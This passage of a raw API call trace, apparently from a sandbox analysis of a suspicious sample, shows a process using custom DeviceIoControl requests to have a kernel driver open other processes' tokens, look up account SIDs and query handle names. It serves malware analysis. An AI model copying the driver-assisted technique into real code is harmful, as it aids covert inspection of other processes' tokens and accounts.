lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.810] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002026b30, HandleInformation=0x0) returned 0x0 [0245.810] ObOpenObjectByPointer (in: Object=0xfffffa8002026b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.810] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x14 [0245.810] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.810] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.810] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.810] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.810] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.812] CloseHandle (hObject=0xc4) returned 1 [0245.812] CloseHandle (hObject=0xc8) returned 1 [0245.812] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.813] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.813] PsAcquireProcessExitSynchronization () returned 0x0 [0245.813] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880053c85d0) [0245.813] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e7ef20, HandleInformation=0x0) returned 0x0 [0245.813] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.813] PsReleaseProcessExitSynchronization () returned 0x2 [0245.813] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0245.813] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.813] ObfDereferenceObject (Object=0xfffffa8001e7ef20) returned 0x1 [0245.813] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.813] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.813] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0245.813] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.813] PsAcquireProcessExitSynchronization () returned 0x0 [0245.813] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880053c85d0) [0245.813] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002028c20, HandleInformation=0x0) returned 0x0 [0245.813] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.813] PsReleaseProcessExitSynchronization () returned 0x2 [0245.813] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0245.813] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.814] ObfDereferenceObject (Object=0xfffffa8002028c20) returned 0x1 [0245.814] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.814] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.814] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.814] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.814] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.814] PsAcquireProcessExitSynchronization () returned 0x0 [0245.814] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880053c85d0) [0245.814] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.814] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.814] PsReleaseProcessExitSynchronization () returned 0x2 [0245.814] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0245.814] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.814] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.814] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.814] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xc8 [0245.814] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.814] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800202ea70, HandleInformation=0x0) returned 0x0 [0245.814] ObOpenObjectByPointer (in: Object=0xfffffa800202ea70, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.814] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x14 [0245.814] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.814] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.814] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.815] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.815] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.816] CloseHandle (hObject=0xc4) returned 1 [0245.816] CloseHandle (hObject=0xc8) returned 1 [0245.816] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.816] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.817] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.817] PsAcquireProcessExitSynchronization () returned 0x0 [0245.817] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880053c85d0) [0245.817] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002031700, HandleInformation=0x0) returned 0x0 [0245.817] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.817] PsReleaseProcessExitSynchronization () returned 0x2 [0245.817] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0245.817] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.817] ObfDereferenceObject (Object=0xfffffa8002031700) returned 0x1 [0245.817] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.817] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.817] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.817] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0245.817] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.817] PsAcquireProcessExitSynchronization () returned 0x0 [0245.817] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880053c85d0) [0245.817] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002028200, HandleInformation=0x0) returned 0x0 [0245.817] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.817] PsReleaseProcessExitSynchronization () returned 0x2 [0245.817] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0245.817] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.817] ObfDereferenceObject (Object=0xfffffa8002028200) returned 0x1 [0245.817] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.817] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.817] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.817] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.818] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.818] PsAcquireProcessExitSynchronization () returned 0x0 [0245.818] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880053c85d0) [0245.818] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.818] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.818] PsReleaseProcessExitSynchronization () returned 0x2 [0245.818] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0245.818] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.818] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.818] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.818] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0xc8 [0245.818] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.818] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002034370, HandleInformation=0x0) returned 0x0 [0245.818] ObOpenObjectByPointer (in: Object=0xfffffa8002034370, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.818] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x14 [0245.818] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.818] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.818] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.818] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.818] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.820] CloseHandle (hObject=0xc4) returned 1 [0245.820] CloseHandle (hObject=0xc8) returned 1 [0245.820] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.820] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.820] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.820] PsAcquireProcessExitSynchronization () returned 0x0 [0245.820] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880053c85d0) [0245.820] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800203a8f0, HandleInformation=0x0) returned 0x0 [0245.821] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.821] PsReleaseProcessExitSynchronization () returned 0x2 [0245.821] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0245.821] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.821] ObfDereferenceObject (Object=0xfffffa800203a8f0) returned 0x1 [0245.821] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.821] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.821] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.821] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0245.821] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.821] PsAcquireProcessExitSynchronization () returned 0x0 [0245.821] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880053c85d0) [0245.821] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800203fc10, HandleInformation=0x0) returned 0x0 [0245.821] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.821] PsReleaseProcessExitSynchronization () returned 0x2 [0245.821] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0245.821] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.821] ObfDereferenceObject (Object=0xfffffa800203fc10) returned 0x1 [0245.821] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.821] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.821] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.821] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.821] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.821] PsAcquireProcessExitSynchronization () returned 0x0 [0245.821] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880053c85d0) [0245.821] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.822] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.822] PsReleaseProcessExitSynchronization () returned 0x2 [0245.822] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0245.822] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.822] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.822] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.822] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0xc8 [0245.822] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.822] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800203a060, HandleInformation=0x0) returned 0x0 [0245.822] ObOpenObjectByPointer (in: Object=0xfffffa800203a060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.822] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x14 [0245.822] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e7fa80 | out: TokenHandle=0xfffffa8001e7fa80*=0xc4) returned 0x0 [0245.822] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.822] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.822] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.822] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.860] CloseHandle (hObject=0xc4) returned 1 [0245.860] CloseHandle (hObject=0xc8) returned 1 [0245.860] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.860] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.860] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.860] PsAcquireProcessExitSynchronization () returned 0x0 [0245.860] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880053c85d0) [0245.860] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800203c3c0, HandleInformation=0x0) returned 0x0 [0245.860] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.860] PsReleaseProcessExitSynchronization () returned 0x2 [0245.860] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0245.860] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.860] ObfDereferenceObject (Object=0xfffffa800203c3c0) returned 0x1 [0245.860] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.860] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.860] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.860] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0245.861] PsLookupProcessByProcessId (in: ProcessId=0x1c0, 